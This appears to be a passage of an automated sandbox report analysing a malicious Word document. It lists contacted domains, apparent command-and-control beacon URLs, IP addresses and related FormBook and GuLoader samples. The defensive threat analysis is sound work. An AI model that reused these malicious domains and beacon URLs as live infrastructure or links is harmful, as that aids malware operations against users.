                      http://www.bscscan.help/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.bscscan.helpexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fire-og.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.orbit4dads.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.renelle.netReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.biyaheph.onlineReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://java.sun.comexplorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hezop.xyz/hs95/www.h9zpoi11.xyzexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000009.00000000.1037825440.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                        		high
                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000009.00000000.1041936992.0000000004423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1047150190.000000000868E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1297921404.0000000004423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1047820508.000000000891C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1041936992.00000000044B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1303350467.000000000868E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305022343.000000000891C000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.babolcai.sbsReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.trhghfghfgh.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.hezop.xyzexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.biyaheph.onlineexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                            		high
                            http://www.kyinyuanwoaini1.com/hs95/www.fire-og.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://localizability/practices/XML.aspexplorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://www.marineqs.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.piriform.com/ccleanerqexplorer.exe, 00000009.00000002.1295616980.0000000002CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1038873621.0000000002CC0000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.fire-og.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.trhghfghfgh.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.kyinyuanwoaini1.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.icra.org/vocabulary/.explorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.bscscan.help/hs95/www.renelle.netexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.h9zpoi11.xyzexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://investor.msn.com/explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://www.marineqs.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.orbit4dads.com/hs95/www.biyaheph.onlineexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.%s.comPAexplorer.exe, 00000009.00000000.1037825440.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.dyj97.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.orbit4dads.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.piriform.com/ccleanervexplorer.exe, 00000009.00000000.1041936992.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1297921404.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.songsurvivor.com/hs95/www.kyinyuanwoaini1.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.songsurvivor.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.kyinyuanwoaini1.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://investor.msn.comexplorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    http://www.biyaheph.online/hs95/www.babolcai.sbsexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.marineqs.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.marineqs.com/hs95/www.trhghfghfgh.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.renelle.net/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.piriform.com/ccleaner1SPS0explorer.exe, 00000009.00000000.1046647563.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1302557807.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://localizability/practices/XMLConfiguration.aspexplorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.kyinyuanwoaini1.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.dyj97.com/hs95/www.orbit4dads.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.hotmail.com/oeexplorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.dyj97.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.h9zpoi11.xyz/hs95/www.marineqs.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.folado.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.orbit4dads.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cell-phones-0406-da-sa-fb.xyzReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.trhghfghfgh.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cell-phones-0406-da-sa-fb.xyz/hs95/www.dyj97.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.songsurvivor.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.piriform.com/ccleanerexplorer.exe, 00000009.00000002.1302557807.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1297921404.0000000004423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1047820508.000000000891C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1041936992.00000000044B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1295616980.0000000002CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1046647563.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1038873621.0000000002CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1303350467.000000000868E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305022343.000000000891C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1302557807.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fire-og.com/hs95/www.hezop.xyzexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://support.mozilla.orgexplorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.babolcai.sbsexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.orbit4dads.com/hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzlexplorer.exe, 00000009.00000002.1306188239.000000000C2FF000.00000004.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              13.248.169.48
                                              		www.folado.comUnited States
                                              		16509AMAZON-02UStrue
                                              188.114.96.3
                                              		www.orbit4dads.comEuropean Union
                                              		13335CLOUDFLARENETUStrue
                                              104.17.158.1
                                              		ssl1.prod.systemdragon.comUnited States
                                              		13335CLOUDFLARENETUStrue
                                              103.242.124.88
                                              		unesa.meIndonesia
                                              		58822IDNIC-UNESA-AS-IDUniversitasNegeriSurabayaIDtrue
                                              15.223.2.12
                                              		unknownUnited States
                                              		16509AMAZON-02UStrue

                                              Private

                                              IP
                                              192.168.2.255

                                              General Information

                                              Joe Sandbox Version:37.1.0 Beryl
                                              Analysis ID:886485
                                              Start date and time:2023-06-13 11:00:10 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 24s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:1
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:Payment_document.docx.doc
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winDOC@10/29@22/6
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HDC Information:
                                              • Successful, ratio: 12.9% (good quality ratio 12.6%)
                                              • Quality average: 66.3%
                                              • Quality standard deviation: 24.2%
                                              HCA Information:
                                              • Successful, ratio: 95%
                                              • Number of executed functions: 65
                                              • Number of non-executed functions: 34
                                              Cookbook Comments:
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer

                                              Warnings

                                              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, svchost.exe
                                              • Execution Graph export aborted for target cleanmgr_settings.exe, PID 3332 because it is empty
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:01:14API Interceptor63x Sleep call for process: EQNEDT32.EXE modified
                                              11:01:17API Interceptor25x Sleep call for process: cleanmgr_settings.exe modified
                                              11:01:20API Interceptor31x Sleep call for process: RegSvcs.exe modified
                                              11:01:33API Interceptor390x Sleep call for process: cmmon32.exe modified
                                              11:01:38API Interceptor2319x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              13.248.169.48AGRUBU_0550.06092023.pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                              • www.seshoo.com/sn84/?-ZSHYpI=30MUCW64bXKAG/bSErEadIyMXABYhrPe39nbMFb/+tlYZNXwpqikvINZaezrW+0JIkbO&y2=8p-DjpZh7XItF
                                              5X2kmGjAFF.exeGet hashmaliciousFormBookBrowse
                                              • www.tribally.net/gg04/?5j=Ur0zdI8mmV+C9R566ySKFlwypoR+AJBGhDff1mdXIzn3aN05IRqi7WSlFVrqRxuCxbY8&2dxx=-ZiTVXB0C
                                              Swift_220523.exeGet hashmaliciousFormBookBrowse
                                              • www.humanlongevity.xyz/cs94/?XT=JNc2mTCZFkxGh6GPKu9HggNwbd9V7fmwA+hlY/Lhag7GAxZNk0HLHvp9s0faClsAPWb6QT6qUQ==&2deD=9rFDa0D8Olbdc
                                              REF-Invoice_72_1421_NOTE.exeGet hashmaliciousFormBookBrowse
                                              • www.tribally.net/gg04/?l6P4BZ=9rsptt6X9xktIB&FN9hzlr=Ur0zdI8mmV+C9R566ySKFlwypoR+AJBGhDff1mdXIzn3aN05IRqi7WSlFVrAOBeC1ZQ8
                                              PO-230102_May_2023.exeGet hashmaliciousFormBookBrowse
                                              • www.homeseller.tips/g3th/?XJE0rP=l8Ud&KXixAHe8=B+18YMR+6SJ6WBNDR8YqcdSd+vM6RFoEKMt09tvvHnygyqGXzQb7W8M2RPKgGoQLNWNS1W0xtQ==
                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                              • www.kenfinnegan.com/ce18/?r4=dqcGZ8cIFapL+A47wdgidaGarfVzehEIGGjOCNEPhAG7P3v2A1udCKQJj1m+Vw8giZQA&UTMXRN=_JBxG2Ahw
                                              188.114.96.3http://ultimatemexico.org/2021/02/23/%E3%83%A8%E3%83%89%E3%82%B3%E3%82%A6-%E3%82%AC%E3%83%AC%E3%83%BC%E3%82%B8-%E5%86%85%E8%A3%85/Get hashmaliciousUnknownBrowse
                                              • ultimatemexico.org/2021/02/23/%E3%83%A8%E3%83%89%E3%82%B3%E3%82%A6-%E3%82%AC%E3%83%AC%E3%83%BC%E3%82%B8-%E5%86%85%E8%A3%85/
                                              E-dekont.exeGet hashmaliciousFormBookBrowse
                                              • www.baba-bahaltarin100.buzz/be85/?1b=vDARlMD6Ilf4nVNnbPG6eBS6+qvaFpj96LlVa6nZjxnSOGkO22TffTAmKTCcbevEho4+&3fcX=h0GHc
                                              QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.eagerlfotv.click/gh6a/?eJdA-=vK1amvlikXiB_z3&8oA_FO=4cfOn6J7yzTOU3ERa7c3MbT1DkZo5T14GbAlXg/bL8sL52Ty7vNSQ7iQb8xwdZP5gTr+6pE/1kV4D7LoBwkpszIaireN1d+qow==
                                              HfIAoLaY80.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.mjsink.com/efft/?IVot=IXl/WIyA65HVhoRMvS7ApdJMtjiLDF/DvnoPuBtD/8oR52JOvkz2w8AmsSYeJn7KOnuQLjJiWsz6SbE1+fYuZtBSZeWTqozbQA==&v-5FVM=qC8KF
                                              7SzUgdO8Ne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.homerag.ovh/hsr8/?TM=W9TuRF0wi&ph9H6u=3eszstX3vycTniK4Q6LI1E534jjDCCSu0dUiDG132xYait1Uw+XViEq9YjHbwDp8ECz74Jz0H4qWeACRPEc8417kmCd+dsq5cw==
                                              0IwziVq2Dr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.hieu.asia/xchu/?k8q=gC/sExE6d/2+ug37cvagpksLyAiBngFRaegKenAFTR5MhaJvp+jR3Se+jdEL070J9mpD&1b_HC=lVfXh
                                              file.exeGet hashmaliciousGuLoaderBrowse
                                              • lazo1t.shop/MICH2/index.php
                                              FastKeys_Setup.exeGet hashmaliciousUnknownBrowse
                                              • fastkeysautomation.com/documentation5/QuickGuide.html
                                              No._PR216696.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • dou3ble.shop/Dbl3/index.php
                                              Potvrda_narudzbe_u_prilogu.exeGet hashmaliciousFormBookBrowse
                                              • www.liputanlima.com/3nop/
                                              rFishhook_1_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.delectabledish.cfd/8h3b/?fyns2O=-7OuqsuSPg&4GyoU=BCC35hNIHnKjI6zqZYuqGDrNRISyoPv24GH3sjJORMu45G5dlHLykqhbs9RMEdpNSsFE/SSwXgSLr9F6LOHYZSJdcYV+7tiUQA==
                                              SHIPPING.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.london168wallet.monster/gh6a/?bF=/ooIjz0c0hDhNunsPLp5su5bNlEB9RqwslRyWqletsgSMoRth3dn4M65ECDaj5fq/7e95vuy8o9CJkMAb0Iysf8stMuhyCt4fQ==&eoK1=qAzWi0SbYZnNmlr4
                                              hkcmd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.delectabledish.cfd/edd5/?a77C=B2RmKfOrokGI0VMFwwvpt5EJADkCJZ5hL/kILG7EqcUaTaNL/jsjz8yNzv2Am2Kupkz0LsjjILzsxkPxAuL0x62CsCSR/JUpwQ==&Ct=coCXWYAIA-
                                              ufuldkommenhederne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.london168wallet.monster/hsr8/?YWGrY=Xx5iOIs7rkggdDxGCoPdFy7fa25UL882klT63BB5TmKJirjQ74fDHZeT4ZXgO4Dgujf07kmFvrc609O4of8mX0e/2fne/kdHNg==&YZQEG=nIxVZRwfs_-FQIL
                                              Restindholdenes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.delectabledish.cfd/8h3b/?rCGp2F=BCC35hNIHnKjI6zqZYuqGDrNRISyoPv24GH3sjJORMu45G5dlHLykqhbs9RMEdpNSsFE/SSwXgSLr9F6LOHYZSJdcYV+7tiUQA==&Rk-=Ut-piRwIBr9
                                              Nurseries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.suzheng22.top/ertr/?mZBo58U=BrWBbAa5gEm68DeVKfSh/K45Pb1EjVGvclV5j6ajhbiNK9Qlijr3vdRP3veBw53uvbuNHtZiwH1apGmUjWl5ptBknQVmkOPWug==&cXFwrb=Ib2sJNr8bGI_v0
                                              Eksproprieringsplanerne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.homerag.ovh/hsr8/?CNsZxU=3eszstX3vycTniK4Q6LI1E534jjDCCSu0dUiDG132xYait1Uw+XViEq9YjHbwDp8ECz74Jz0H4qWeACRPEc8417kmCd+dsq5cw==&VvDvBN=2wpfV8C-f6
                                              E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.hjd1fe.com/be53/?QpfD=N3vjUApNu9wS8yH32TRQzau5TPGO3Kji/6akX3n80f5iXBWTQNwpz2wPTEYfQfcl+g4T&0ro=V6LtODYPixf0Mnz0
                                              dekont.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • dblg023.shop/PL341/index.php
                                              Damoiseau.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.suzheng22.top/hnqa/?nUL8F1=1gdNHjWH3AZCjewcXImrPEgbwiENp4jzzwMlHRFAIR8z6xwVMfff3NB+5n7lmDsl0pN3EDUBlPUPcyD0G5sMJCvE4wQ/B0hYew==&50Fuze=oP0V5ij6E

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ssl1.prod.systemdragon.comE-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 104.17.157.1
                                              E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 104.17.158.1
                                              PO_3534272.exeGet hashmaliciousFormBookBrowse
                                              • 104.17.157.1

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUShttp://23.227.38.32Get hashmaliciousUnknownBrowse
                                              • 104.18.16.182
                                              https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                              • 104.18.25.173
                                              https://abidfoundation.in//redirect.php?v=28cda3151f8a2b9Get hashmaliciousHTMLPhisherBrowse
                                              • 104.21.28.128
                                              https://i.fluffy.cc/LKPv8pQ1STRThKZNC7ZfRZB87TMm2B8c.bz2Get hashmaliciousUnknownBrowse
                                              • 172.67.157.151
                                              ATT00001.htmGet hashmaliciousUnknownBrowse
                                              • 104.18.7.145
                                              https://heineken.com@linkgo.is/IHyoUiQL/?gratis-heineken-bier.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              http://ultimatemexico.org/2021/02/23/%E3%83%A8%E3%83%89%E3%82%B3%E3%82%A6-%E3%82%AC%E3%83%AC%E3%83%BC%E3%82%B8-%E5%86%85%E8%A3%85/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              http://ipprimetv.comGet hashmaliciousHTMLPhisherBrowse
                                              • 188.114.96.3
                                              https://ipprimetv.com/Get hashmaliciousHTMLPhisherBrowse
                                              • 188.114.96.3
                                              https://besthomepackers.co.in/?gclid=EAIaIQobChMI-vCM3_a0_wIV845LBR26iAe6EAEYASAAEgKIC_D_BwEGet hashmaliciousHTMLPhisherBrowse
                                              • 188.114.97.3
                                              http://besthomepackers.co.inGet hashmaliciousHTMLPhisherBrowse
                                              • 172.67.189.27
                                              http://eulerian.officiel-des-vacances.com/dynclick/officiel-vacances/?eml-publisher=MREL&eml-name=mindbaz_retargeting_m4&eml-ctype=CTYPE&eemail=958c5e006c0d43c2ae3f77f528032e88&eurl=https%3A%2F%2F/chainstrading.net%2FEmail%2FVerify%2Fsf_rand_string_lowercase6%2F%2F%2F%2FamFjb2Iuc21pdGhAYWdzaGVhbHRoLmNvbQ==Get hashmaliciousUnknownBrowse
                                              • 104.16.123.96
                                              https://r20.rs6.net/tn.jsp?f=001BIxBKiUtsTCIpWtdP9HlmRA4n4Zx_5DCQxecjBK2gxGIVCHzwONDEtz6pbl-p-8_JbD1fjk3SC16S62mrLLVicxja_GJnpT_xOt8p5oMd5tX3P3sE9CXfBpw8FZ9uzgJQYO7Vj7dWCC9ayG61VkPr3thfDVEKOLIRfqyW6OamvMF_ZbO0IsM76C8JpvGErXPwgn1vnDJ7Yg=&c=SkbFlSz6eLH_ZUa-Ur2h3fC2JKYKVsFLpMn_u2m5fkPpAErB3jIxDA==&ch=5I7PHuL_HLs9zPnQtkSA_rkKBzuvp3ri_VVRDWIObXcykp6_xSqtJQ==&__=?e=YmF1ZG9pbi5kZWJ1c3N5QHhmYWIuY29tGet hashmaliciousUnknownBrowse
                                              • 104.17.24.14
                                              https://r20.rs6.net/tn.jsp?f=001XWEUmpd20x3YwaeHVP3-3XdlE2vmwHgg-IZ3fvNGlZkQ1Ikvv4-rSsqEm8QLGDo8kFQ8PYcFSEWWXidiyQS8P0vkSXHkezLgs46Xm_TybCuaig9OP6MznrvOiWHQr-0Jm3HYXkE_CDRdCzOTb1qO44IPAcjT6yoJ-syErY8uf6nAJ6jznNgBX7D6Mo1XNLRvx1F-brlSLd8=&c=ZOd9nWobPZnf-kOmJ0-EvZxWNeIQRh8nuKyWgy2CrTKQKKbeWyh2vg==&ch=7VaepYrd8GCBrE4yL3OZd3i_dN7i-dyjbyxz7CwjxJ_RMevwr8Rb-w==&__=?e=baudoin.debussy@xfab.comGet hashmaliciousCaptcha PhishBrowse
                                              • 104.16.57.101
                                              [SPAM] Document shared with you_ _Current Report-Q1 Financial Statements_.emlGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                              • 104.16.169.131
                                              https://eurofinsgenomics.com/handlers/sitenavigator.aspx?returnurl=http://qvk9gw.csb.app.mcas-df.ms/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              http://pin.salsalabs.com/dia/track.jsp?v=2&c=46SPxAm4NYbCDBcxIvs8ovFBabqGR8NX&url=https%3A%2F%2Fchaakraconsulting.com%2Fcook%2Fwwchaakracondomain/cndhbGtlckBhY2Fjb21wbGlhbmNlZ3JvdXAuY29tGet hashmaliciousHTMLPhisherBrowse
                                              • 104.16.124.175
                                              https://spitefulaquamarineaddition.perssonwork.repl.co/intro.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.27.192
                                              https://sfca.gmgadvertising.com/wp-includes/widgets/akasim/6-a6f5e4b9a0-gkwwld/ZTRiOWEwLWdrd3dsZ/Login.phpGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://pub-77f177c90c184714a5af36fa8464a586.r2.dev/screend.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.3.35
                                              AMAZON-02UShttps://github.com/Pyran1/MalwareDatabaseUnsorted/blob/master/Samples/000e565854d24a54e6a853d7119dbe598a329b0340aa044f222e1b02c371c599.docGet hashmaliciousUnknownBrowse
                                              • 54.153.56.183
                                              http://23.227.38.32Get hashmaliciousUnknownBrowse
                                              • 54.77.223.183
